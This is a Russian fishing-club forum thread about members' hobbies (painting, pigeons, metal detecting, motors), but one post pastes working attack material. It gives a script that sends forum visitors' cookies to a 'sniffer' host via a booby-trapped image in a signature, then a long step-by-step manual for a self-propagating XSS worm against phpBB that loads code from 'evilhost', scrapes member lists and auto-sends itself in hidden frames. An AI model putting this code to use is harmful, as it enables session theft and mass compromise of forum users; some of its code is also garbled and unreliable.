Наши увлечения

Все остальные увлечения наших посетителей

Модератор: Модераторы

Наши увлечения

Сообщение№26 от  AleKo » 19 дек 2010, 23:30

Владимир_Сахаров писал(а): начал с малого:

А шестеренки не кутятся ? Это кстати еще один вариант защиты информации - примостырил ножи от мясорубки - пока пороль не введеш они вращаются с бешенной скоростью.И похититель рискует оставить на системнике не только отпечатки пальцев но их носители возле компьютера */* .

А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать.
мэр славного города - Киев .

Аватар пользователя
AleKo
Александр Викторович
Модератор
 
Сообщений: 2405
Зарегистрирован: 25 май 2009, 15:19
Откуда: Ульяновск/Микрорайон Свияга
Отзывы за сообщения: 1
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№27 от  AR-7 » 20 дек 2010, 00:15

:HI: это просто элемент декора...

Надорвался, рассказывая о том, какую большую рыбину поймал...

Аватар пользователя
AR-7
Vladimir
 
Сообщений: 617
Зарегистрирован: 16 дек 2009, 14:41
Откуда: Ульяновск
Отзывы за сообщения: 9
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№28 от  gruzdoff » 20 дек 2010, 19:51

Голубей кто держит?

Теоретик .......

Аватар пользователя
gruzdoff
Груздов Сергей Валентинович
Член Клуба
 
Сообщений: 7434
Зарегистрирован: 23 июл 2009, 21:34
Откуда: Сурское
Отзывы за сообщения: 49
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№29 от  Димон » 20 дек 2010, 20:25

gruzdoff писал(а):Голубей кто держит?

Сосед, на против гаража :D

Человек, который ушел, ушел навсегда.
Человек, который вернулся, уже другой человек
(Макс Фрай)

Аватар пользователя
Димон
Дмитрий
Член Клуба
 
Сообщений: 751
Зарегистрирован: 29 дек 2008, 00:33
Откуда: г.Ульяновск,Рябикова
Отзывы за сообщения: 0
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№30 от  uat » 20 дек 2010, 22:04

в плену?


uat
Александр Сергеевич
 
Сообщений: 8306
Зарегистрирован: 28 окт 2008, 08:15
Откуда: Ульяновск
Отзывы за сообщения: 31
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№31 от  AR-7 » 26 фев 2011, 19:07

Как увести куки с форума
________________________
созайём в блокноте скрипт - <script>
img = new Image(); img.src = "твой сниффер/картинка?"+document.cookie;
</script>
и сохраняем как gif, jpg, jpeg, png...
и заливаем на форум например в подпись, подписываем например - здесь то что вы никогда в жизни не видели и ждем жертв...
и не забываем читать в нете про XSS...


ВСЯ ИНФОРМАЦИЯ В МОЕМ ПОСТЕ ТОЛЬКО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ... :D

Создание xss червя
________________________________________

Сейчас мы будем проводить некоторые манипуляции с браузером пользователя но уже с более сложной целью и, соответственно, с более сложным решением. Без справочника по JS врят-ли Вам удастся здесь обойтись.
Для начала небольшое описание нашего эксперимента. Мы создадим сайт с становленным phpBB версии 2.0.15 (можно взять на диске в папке /phpBB2.0.15/). Назовите хост просто "phpbb" В этой версии phpBB была найдена активная (хранимая) XSS уязвимость в скрипте отправки сообщений, которая работает только с браузером IE.
Основное действие, которое выполнять червь для своего существования - распространение. Распространяться червь будет следующим образом – вместе с сообщением, отправленным жертве будет приходить эксплоит который заставит жертву отослать его ещё кому ни будь. И так до бесконечности. Разбор и изменение эксплойта.
Для начала рассмотрим эксплоит к самой уязвимости который опубликован на milw0rm.com
Вот такая строка должна вставиться в сообщение что бы каждый пользователь отправлял cookies на указанный сниффер. Но, как Вы наверное уже поняли – кража cookies нас не интересует. Поэтому нам придётся изменять
тело эксплойта под свои нужды. Нам интересен следующий участок этого текста:
style='top:expression(eval(this.sss);'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgibin/
shell.jpg?'+document.cookie;this.sss=null`
Для лучшей читабельности разделим его вот так:
style='top:expression(eval(this.sss);'
sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`
Здесь в свойстве style прописано выполнение кода, находящегося в свойстве sss, функцией eval(). А в этом
свойстве находится вот такой код:
i=new/**/Image();
i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;
this.sss=null
Здесь создаётся новое изображение, и как его источник даётся адрес сниффера. Вот именно этот код нам нужно изменить. Теперь перейдём к методике самой атаки. Мы можем пойти двумя путями:
1. Вписать в переменную sss весь код который нам нужен.
2. Вписать в переменную sss код который подключит скрипт со стороннего хоста (там и будет лежать основной код).
В первом варианте нам понадобится оставить сообщение огромных размеров – это очень неудобно, ведь чем меньше само сообщение тем проще находить в нём ошибки и недочёты, если таковые появятся. Тем более червю же нужно будет заниматься самораспространением, и такие объёмы передаваемого текста могут обернуться против нас. Поэтому мы пойдём вторым путём – основной код будем хранить на отдельном хосте, а в сообщение впишем только код осуществляющий запрос к нам на сервер. Этот код просто будет дописывать теги <script></script> у которых свойство src будет указывать на наш сервер. Для этого на хосте evilhost разместите скрипт script.js содержащий всего одну строку:
alert('tested!');
С помощью этого сообщения мы будем проверять – подключился наш код или нет.
Далее нужно будет вписать теги script в тело страницы. Здесь есть 3 пути осуществления подобных действий:
1. Вписать эти теги с помощью метода document.write()
2. Вписать эти теги с помощью innerHTML любого тега находящегося на странице
3. Создать эти теги с помощью DOM-свойств.
Третий вариант наиболее приемлем вот почему – используя метод document.write() можно просто затереть содержимое всего документа, то есть пользователь будет видеть пустую белую страничку. Второй вариант тоже
не подойдёт потому что при приёме сообщения в нём фильтруются символы "<" и ">" - а без них мы не сможем написать <script src='http://evilhost/script.js'></script>. И вот тут нам как раз подходит третий вариант так как с помощью некоторых DOM-методов можно создавать теги просто по их имени избегая фильтруемых символов. Сейчас мы разработаем сам код который будет внедрять в тело документа посторонний скрипт.
Сделаем мы это с помощью одной html-странички и нашего же скрипта script.js.
На хосте phpbb создайте страничку script.html следующего содержания:
<html>
<head>
<title></title>
</head>
<body>
</body>
</html>
Теперь в теге body создайте теги <script></script> и впишите в них следующий код:
// Создаём новый тег script
var sc=document.createElement('script');
// Указываем значение его свойства src
sc.src='http://evilhost/script.js';
// Получаем в массив body все данные тега <body>
var body=document.getElementsByTagName('body');
// С помощью свойсва appendChild создаём наш тег <script>
// как потомок тега body
body[0].appendChild(sc);
Полный код script.html должен выглядеть так:
<html>
<head>
<title></title>
</head>
<body>
<script>
// Создаём новый тег <script>
var sc = document.createElement('script');
// Указываем значение его свойства src
sc.src = 'http://evilhost/script.js';
// Получаем в массив body все данные тега <body>
var body = document.getElementsByTagName('body');
// С помощью свойсва appendChild создаём наш тег script
// как потомок тега body
body[0].appendChild(sc);
</script>
</body>
</html>

Теперь нужно открыть эту страничку в браузере и Вы увидите сообщение со словом "tested!".
Наш код полностью рабочий. Теперь нам нужно объединить его в одну строку и при этом избежать двух проблем:
1. Пробелы. Пробелов нужно сделать как можно меньше и в последствии заменить их на "/**/" (это символы открытия и закрытия комментариев в скрипте).
Решим её вот как. Для начала уберём из кода все комментарии и удалим пробелы около знаков равенства:
var sc=document.createElement('script');
sc.src='http://evilhost/script.js';
var body=document.getElementsByTagName('body');
body[0].appendChild(sc);
Как видите у нас остались только пробелы после "var". Заменим их на "/**/". Далее объединим код в одну строку. У Вас должен получиться следующий текст:
var/**/sc=document.createElement('script');sc.src='http://evilhost/script.js';var/**/body=document.getElements
ByTagName('body');body[0].appendChild(sc);
И вот теперь вторая проблема – кавычки. С ними действительно можно хорошо помаяться если вовремя не уделить им внимание (заметьте - в коде везде используются только одинарные кавычки). Для устранения различных неувязок с кодом в будущем можно использовать функцию escape(), которая заменяет различные специальные символы на их ASCII-аналоги. Что бы получить текст обработанный этой функцией выполним
следующее: весь наш код поместим в функцию escape() в двойные кавычки, и то что получиться поместим в
метод document.write():
document.write(escape("var/**/sc=document.createElement('script');sc.src='http://evilhost/script.js';var/**/bod
y=document.getElementsByTagName('body');body[0].appendChild(sc);");
При выполнении данного кода высветится следующий текст:
var/**/sc%3Ddocument.createElement%28%27script%27%29%3Bsc .src%3D%27http%3A//evilhost/script.js
%27%3Bvar/**/body%3Ddocument.getElementsByTagName%28%27body%27% 29%3Bbody
%5B0%5D.appendChild%28sc%29%3B
Вот именно его мы и поместим в переменную sss. Только перед этим мы поменяем код
style='top:expression(eval(this.sss);'
на
style='top:expression(eval(unescape(this.sss);'
ведь мы свой код проводили через функцию escape(), соответственно при выполнении мы должны привести код обратно в исходный вид, и сделает это функция unescape(). Объединив всё это и вставив в эксплоит мы получим текст сообщения:
Отправьте такое сообщение на любой аккаунт и посмотрите его через IE. Вы увидите сообщение с текстом "tested!".
Не удивляйтесь если сообщение будет выскакивать множество раз (иногда может выскакивать бесконечно). Это недоработка имеющаяся в IE, в версиях 6.* и 7.*. Дальше мы разберёмся с этой проблемой Теперь нам остаётся только модифицировать содержимое script.js вписывая туда код отправки сообщений. Если описывать словами то нам просто нужно вписать туда код генерации iframe`a и заполнить форму отправки
сообщения, которая в нём откроется. Получение случайного номера пользователя.
Перейдём к распространению. Как говорилось выше – распространяться червь будет с помощью рассылки опасных сообщений другим пользователям. Вопрос только в том как найти этих пользователей. Как мне кажется, самый лучший вариант здесь это каким-либо образом проанализировать список пользователей, который выдаёт скрипт memberlist.php – что мы сейчас и сделаем. Сначала, естественно нам нужно создать иллюзию форума с большим количеством пользователей. Для этого есть множество разных способов. Один из них — написать скрипт который добавит в базу 100-200 пользователей. Подумайте, как это сделать. Определять номера пользователей мы будем с помощью анализа ссылок которые появляются в нижней части сайта, указывающие на следующие страницы списка
пользователей. Обратите внимание на то что ссылки заканчиваются не на номер страницы, а на номер пользователя с которого нужно начать просмотр.
То есть мы просто будем отфильтровывать эти номера с помощью JavaScript и выберем из них больший. Сначала нужный нам код мы запишем в script.html и уже после полной проверки и отладки запустим его в основной код червя.
Начальное содержимое script.html следующее:
<html>
<head>
<title></title>
</head>
<body>
<iframe src='http://phpbb/memberlist.php' name='evilframe' id='evilframe' onLoad='test();'></iframe>
<script>
</script>
</body>
</html>
Как видите – по окончанию загрузки фрейм вызывает функцию getMaxUserId(). Давайте напишем её. Алгоритм работы этой функции будет следующий – сначала мы получим код находящийся внутри тегов <body> внутри фрейма. Затем мы с помощью регулярного выражения начнём искать номера пользователей в ссылках внизу страницы. Ну и в конце концов сравним все полученные числа и выберем из них максимальное. Поиск номеров
после ссылок мы будем производить с помощью регулярного выражения.
function getMaxUserId()
{
var body_arr = window.evilframe.document.getElementsByTagName('bo dy');
var body = body_arr[0].innerHTML;
var reg = new RegExp("start=\\d*","g");
m = new Array();
m = body.match(reg);
var max = new String(m[0]);
max = Number(max.replace("start=","");
for(var i = 1; i < m.length; i++)
{
var x = new String(m[i]);
x = Number(x.replace("start=","");
if (x > max) max = x;
}
return max;
}
Сама функция выглядит довольно странно. Давайте разберём пошагово её работу. Сначала функция получает html-код тега <body> от документа который загружен в нашем фрейме. Затем мы создаём регулярное выражение которое ищет в нужно строке совпадения по следующему шаблону: start=[любое количество чисел] Такой поиск осуществляется вот почему – посмотрите на ссылки которые ведут, например, на вторую страницу списка пользователей. Число после "start=" обозначает номер пользователя с которого начинать показ. То есть в нашем случае регулярное выражение найдёт все концы ссылок на списки пользователей и поместит их в массив m. Это будут следующие выражения:
start=50
start=100
start=150
Затем мы просто берём первый элемент массива m и устанавливаем его как максимальное значение. Далее мы с помощью цикла перебираем все ячейки массива m и выбираем самое максимальное число из него. Так как мы собираемся рассылать заражённые письма случайным пользователям то нам нужно написать и функцию получения случайного числа из заданного диапазона. Этой функции мы передадим максимальный номер пользователя (полученный функцией getMaxUserId() и она выдаст любое число в
диапазоне от нуля до указанного нами чиста. В JavaScript такой функции нет. Мы используем следующее решение:

function rand(m,n)
{
m = parseInt(m);
n = parseInt(n);
return Math.floor( Math.random() * (n - m + 1) ) + m;
}
Теперь нам предстоит последний шаг в определении случайного номера пользователя – написать функцию
которая бы объединяла и getMaxUserId() и rand(). Назовём её getRandomUserId():
function getRandomUserId()
{
var max = getMaxUserId();
return rand(0,max);
}
Теперь данная функция будет возвращать случайный номер пользователя. Для проверки работоспособности данного кода напишем функцию test() которая, как Вы помните, запускается при окончании загрузки нашего фрейма:
function test()
{
alert(getRandomUserId();
}
Эта функция нужна будет нам только пока мы работаем в script.html. Обновите страничку несколько раз и Вы увидите сообщения с различными номерами пользователей.
Далее перейдём ко второй части нашей задачи – открытию формы личного сообщения, её заполнению и отправке. Вы уже можете поместить код 3 наших функций (getRandomUserId(),getMaxUserId() и rand() в
script.js, который подключается при просмотре опасного сообщения.
Начинаться наш скрипт должен, как Вы наверное уже догадались, с создания iframe`a который позволит скрипту получить случайный номер пользователя:
// Проверка на кол-во iframe`ов
var iframes = document.getElementsByTagName('iframe');
if (iframes.length == 0)
{
// Создание нового iframe`a в котором откроется
// список пользователей
var iframe = document.createElement('iframe');
iframe.src = 'http://phpbb/memberlist.php';
iframe.id = 'evilframe';
iframe.name = 'evilframe';
// Добавление созданного iframe`a в документ
var body = document.getElementsByTagName('body');
body[0].appendChild(iframe);
iframe = null;
// Установка события onLoad() фрейма
document.getElementById('evilframe').onload = function(){do_it()}
}
Вас, наверное, заинтересует первая и вторая строки. Сейчас объясню для чего они нужны. Помните в самом начале, когда в script.js был только код "alert('test');", я описывал недоработку IE в связи с которой он начинает бесконечно показывать тестовое сообщение? Так вот с iframe`ами может произойти тоже самое, а этого нам не
нужно. Поэтому мы в самом начале скрипта просто проверяем количество iframe`ов которые имеются на странице. Если их число больше нуля то мы ничего не делаем. Соответственно, как бы IE не зацикливался у него получиться добавить только один iframe – чего мы и добиваемся. После окончания загрузки фрейма браузер вызовет функцию do_it(),вот её код:
function do_it()
{
// Получаем случайный номер пользователя
var uid = getRandomUserId();
// с помощью innerHTML мы дописываем в
// тело документа второй фрейм
var body = document.getElementsByTagName('body');
// Ссылка на создание сообщения пользователю
// чей номер нам вернула функция getRandomUserId()
var src = 'http://phpbb/privmsg.php?mode=post&u='+uid;
body[0].innerHTML +="<iframe name='send_frame' id='send_frame' src='"+src+"'
onLoad='send();'></iframe>";
}
Второй фрейм, который добавляется в этой функции do_it(), нужен именно для открытия в нём формы
отправки сообщения. И наконец-то последняя функция – send() - она просто заполнит и отправит форму:
function send()
{
// Эксплоит. То же самое что мы отправляли в сообщении в самом начале.
var exploit = "Hello!www.ut'";
// Тема сообщения
window.send_frame.document.post.subject.value='Hel lo!';
// Содержимое сообщения (эксплоит)
window.send_frame.document.post.message.value=expl oit;
// Отправляем форму
window.send_frame.document.post.post.click();
}
Как видите – ничего сложного. Теперь при просмотре сообщения через IE браузер отправит эксплоит
случайному пользователю. Для полноты картины Вы можете установить свойства width и lenght фреймов в 0
или как-то по другому их скрыть. А что бы не маяться и не искать кому же червь себя отправил просто
посмотрите в базе форума содержимое таблицы phpbb_privmsgs_text. Полный код script.js Вы можете взять на
диске в папке /chapter_2/evilhost/www/.

Автор мануала не я...На случай авторского права и т.п.

Надорвался, рассказывая о том, какую большую рыбину поймал...

Аватар пользователя
AR-7
Vladimir
 
Сообщений: 617
Зарегистрирован: 16 дек 2009, 14:41
Откуда: Ульяновск
Отзывы за сообщения: 9
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№32 от  sanekswarnoi » 26 фев 2011, 19:14

Владимир_Сахаров
Молодой человек, вы форумы не попутали?
З.Ы Володя пиши отчёты о рыбалке и не занимайся всякой хнёй!

Мудрость: это когда задница успокоилась и уже ничего не ищет.

Аватар пользователя
sanekswarnoi
Александр
Член Клуба
Человек года 2012
Модератор
 
Сообщений: 5557
Зарегистрирован: 20 окт 2008, 03:34
Откуда: Ульяновск север
Отзывы за сообщения: 339
За последние 12 месяцев: 2
За последние 30 дней: 0

Наши увлечения

Сообщение№33 от  витек » 14 апр 2011, 21:39

Ставки на спорт.Предпочтение футболу.Сегодня 5тыр.на победу порту поставил,пока всё идёт как надо,да и пиво до перерыва хватило.


витек
Виктор
 
Сообщений: 44
Зарегистрирован: 10 авг 2009, 19:33
Отзывы за сообщения: 0
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№34 от  Soldier » 21 апр 2011, 23:11

Всем форумчанам привет.
Я увлекаюсь русским рукопашным боем.
Если из вас есть кто то с таким же видом увлечения,пишите.
Да,к стати,мне нужен спаринг-партнёр,если есть у кого желание,пишите в личку,буду очень рад! :roll:

Дураков на свете мало, но расставлены они так грамотно, что встречаются на каждом шагу!

Аватар пользователя
Soldier
Володя
 
Сообщений: 326
Зарегистрирован: 17 янв 2010, 15:02
Откуда: д.Засвияжье,Север
Отзывы за сообщения: 16
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№35 от  kmkfsorf » 08 июн 2011, 21:16

привет всем. у меня вот оже есть увлечение по мимо рыбалки. но материал черпаю именно с рыбалок. пишу картины маслом. http://s016.radikal.ru/i335/1106/81/bbe11efffba1.jpg


Аватар пользователя
kmkfsorf
сергей
 
Сообщений: 170
Зарегистрирован: 20 апр 2010, 22:28
Откуда: г.Ульяновск/новый город
Отзывы за сообщения: 50
За последние 12 месяцев: 11
За последние 30 дней: 0

Наши увлечения

Сообщение№36 от  VIK » 08 июн 2011, 22:59

kmkfsorf

Молодец! Сам люблю это дело, но.. на все сейчас просто не хватает времени :sad:

На хотенье - есть терпенье.
Чем длиннее руки у рыболова, тем меньше веры его рассказам.

Аватар пользователя
VIK
Касапский Виктор Леонидович
Член Клуба
Человек года 2010
Модератор
 
Сообщений: 5293
Зарегистрирован: 22 окт 2008, 15:28
Откуда: Ульяновск. Новый город
Отзывы за сообщения: 519
За последние 12 месяцев: 4
За последние 30 дней: 0

Наши увлечения

Сообщение№37 от  andersen » 09 июн 2011, 17:18

kmkfsorf

Действительно красиво :razz: . На продажу рисуешь?

Обходя грабли, мы теряем бесценный опыт.
Есть два вида граблей: первые - которые чему-то учат, и вторые мои любимые ;)

Аватар пользователя
andersen
Андрей
 
Сообщений: 2335
Зарегистрирован: 10 июл 2010, 04:18
Откуда: Ульяновск
Отзывы за сообщения: 268
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№38 от  Антоха » 09 июн 2011, 17:21

Картины не рисуют, а пишут!


Антоха
Антон
 
Сообщений: 175
Зарегистрирован: 31 мар 2010, 19:18
Откуда: Ульяновск Центр
Отзывы за сообщения: 4
За последние 12 месяцев: 3
За последние 30 дней: 0

Наши увлечения

Сообщение№39 от  Region73 » 01 сен 2011, 21:26

Вот снял весной этого года маленький клипик про родной край. Продолжение следует.. :roll:
Ундоры. Весна 2011г.

[youtube]http://www.youtube.com/watch?v=Yk0_eKr23QA[/youtube]


Аватар пользователя
Region73
Андрей
 
Сообщений: 794
Зарегистрирован: 10 апр 2009, 23:39
Откуда: Дальнее Засвияжье
Отзывы за сообщения: 232
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№40 от  Бек » 23 ноя 2011, 00:08

а вот мое увлечение :)

Вложения
PA290288.JPG
PA290288.JPG (53.99 Кб) Просмотров: 1043

Аватар пользователя
Бек
Сергей
Член Клуба
Модератор
 
Сообщений: 2456
Зарегистрирован: 22 ноя 2011, 23:09
Откуда: Чердаклинский р-н. пос. Октябрьский - Москва
Отзывы за сообщения: 256
За последние 12 месяцев: 2
За последние 30 дней: 0

Наши увлечения

Сообщение№41 от  DENIS » 23 ноя 2011, 00:19

А я вот огород не люблю копать :)
Но если попадается такое(ПОЛЕ ЧУДЕС), то можно :D

В этом вашем интернете хрен поймешь, кто прикалывается, а кто реально дебил.

Аватар пользователя
DENIS
Денис
Член Клуба
 
Сообщений: 1305
Зарегистрирован: 06 май 2009, 17:23
Откуда: дальнее засвияжье
Отзывы за сообщения: 183
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№42 от  Бек » 23 ноя 2011, 00:23

кстати это с огорода :) я огороды копаю только с металлодетектором :D но больше поля, луга, урочища :)


Аватар пользователя
Бек
Сергей
Член Клуба
Модератор
 
Сообщений: 2456
Зарегистрирован: 22 ноя 2011, 23:09
Откуда: Чердаклинский р-н. пос. Октябрьский - Москва
Отзывы за сообщения: 256
За последние 12 месяцев: 2
За последние 30 дней: 0

Наши увлечения

Сообщение№43 от  Алексей » 23 ноя 2011, 00:33

Что нибудь ценное находили? :)


Аватар пользователя
Алексей
Алексей
Член Клуба
Член ФРС
Победитель Кубка УРИК 2011
 
Сообщений: 1077
Зарегистрирован: 24 фев 2009, 16:24
Откуда: Ульяновск. центр.
Отзывы за сообщения: 181
За последние 12 месяцев: 5
За последние 30 дней: 0

Наши увлечения

Сообщение№44 от  Бек » 23 ноя 2011, 00:56

всякое бывает :)


Аватар пользователя
Бек
Сергей
Член Клуба
Модератор
 
Сообщений: 2456
Зарегистрирован: 22 ноя 2011, 23:09
Откуда: Чердаклинский р-н. пос. Октябрьский - Москва
Отзывы за сообщения: 256
За последние 12 месяцев: 2
За последние 30 дней: 0

Наши увлечения

Сообщение№45 от  DENIS » 23 ноя 2011, 01:08

sphinx писал(а):кстати это с огорода :) я огороды копаю только с металлодетектором :D но больше поля, луга, урочища :)

Уро́чище — в физической географии — одна из морфологических частей географического ландшафта, сопряжённая система фаций и их групп (подурочищ), объединяемых общей направленностью физико-географических процессов и приуроченных к одной мезоформе рельефа на однородном субстрате.

В широком понимании УРОЧИЩЕМ является любая часть местности, отличная от остальных участков окружающей местности. Например, это может быть лесной массив среди поля, болото или нечто подобное[1], а также участок местности, являющийся естественной границей между чем-либо.

Нередко на топографических картах термин «урочище» используется вместе с соответствующим топонимом для обозначения определённых территорий (обычно небольших, в поперечнике от нескольких км до нескольких десятков км), имеющих устойчивое название у местного населения. Особенно распространена такая практика в Казахстане, Узбекистане, Туркменистане. Для территории Российской Федерации на топографических картах термином "урочище" часто обозначают место, на котором ранее сущестовал населённый пункт, который ныне обезлюдел и таковым уже не является.



Просто я не знал, что такое УРОЧИЩЕ :)

В этом вашем интернете хрен поймешь, кто прикалывается, а кто реально дебил.

Аватар пользователя
DENIS
Денис
Член Клуба
 
Сообщений: 1305
Зарегистрирован: 06 май 2009, 17:23
Откуда: дальнее засвияжье
Отзывы за сообщения: 183
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№46 от  andersen » 23 ноя 2011, 01:37

В Болгаре в том году когда уровень Волги был низким, очень много искателей лазило по оголившимся берегам и отмелям с металлоискателями, золотишко наверно ордынское искали :D

Обходя грабли, мы теряем бесценный опыт.
Есть два вида граблей: первые - которые чему-то учат, и вторые мои любимые ;)

Аватар пользователя
andersen
Андрей
 
Сообщений: 2335
Зарегистрирован: 10 июл 2010, 04:18
Откуда: Ульяновск
Отзывы за сообщения: 268
За последние 12 месяцев: 0
За последние 30 дней: 0

Наши увлечения

Сообщение№47 от  Бек » 23 ноя 2011, 08:43

[quote="andersen" золотишко наверно ордынское искали :D[/quote]
ну золотишко это что то мифическое, а вот серебро бывает :D


Аватар пользователя
Бек
Сергей
Член Клуба
Модератор
 
Сообщений: 2456
Зарегистрирован: 22 ноя 2011, 23:09
Откуда: Чердаклинский р-н. пос. Октябрьский - Москва
Отзывы за сообщения: 256
За последние 12 месяцев: 2
За последние 30 дней: 0

Наши увлечения

Сообщение№48 от  MASEL » 15 янв 2012, 22:04

andersen
В Болгарах вообще в принципе нельзя собирать и искать(на сколько я знаю,там заповедник,статья сразу)

"начинающий рыбак Павлик" на "Профессор кислых щей"...

Аватар пользователя
MASEL
МАСЛОВ ПАВЕЛ ОЛЕГОВИЧ
Член Клуба
Победитель Кубка УРИК 2012
 
Сообщений: 1351
Зарегистрирован: 31 мар 2010, 11:17
Откуда: УЛЬЯНОВСК,КИНДЯКОВКА.
Отзывы за сообщения: 310
За последние 12 месяцев: 45
За последние 30 дней: 5

Наши увлечения

Сообщение№49 от  andersen » 16 янв 2012, 18:46

MASEL
Пашок мне так то накласть на это, не мне ж её прилепят,( я не ищу там, я ловлю :D ), а ищет народу там много, не раз наблюдал.

Обходя грабли, мы теряем бесценный опыт.
Есть два вида граблей: первые - которые чему-то учат, и вторые мои любимые ;)

Аватар пользователя
andersen
Андрей
 
Сообщений: 2335
Зарегистрирован: 10 июл 2010, 04:18
Откуда: Ульяновск
Отзывы за сообщения: 268
За последние 12 месяцев: 0
За последние 30 дней: 0

Загрузка...

Наши увлечения

Сообщение№50 от  GriVA » 09 окт 2013, 21:39

Сегодня производили дефлорацию моей ямахе 9,9 и делали из нее женщину (15ку то бишь) :D .
Тут ниче интересного, на русфишинге и мотолодке давно разжевано.
Оказалось даже проще чем казалось :) . Инструкцию распечатал и праеп дома, сделал все по наитию, дома проверился- все верно.
Канеш все это интереснее с пивком.. Канеш все веселее под гармошку *|||*

Вованы4 жжот по завершению работы.
Теперь жду выхи чтобы опробовать моторчег в деле.

Серьезные разговоры - не мой конёк, мой конёк - горбунок!

Аватар пользователя
GriVA
Владимир
 
Сообщений: 1598
Зарегистрирован: 21 авг 2010, 16:29
Откуда: Д-град
Отзывы за сообщения: 295
За последние 12 месяцев: 0
За последние 30 дней: 0




Пред.След.



Вернуться в Остальные увлечения форумчан

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1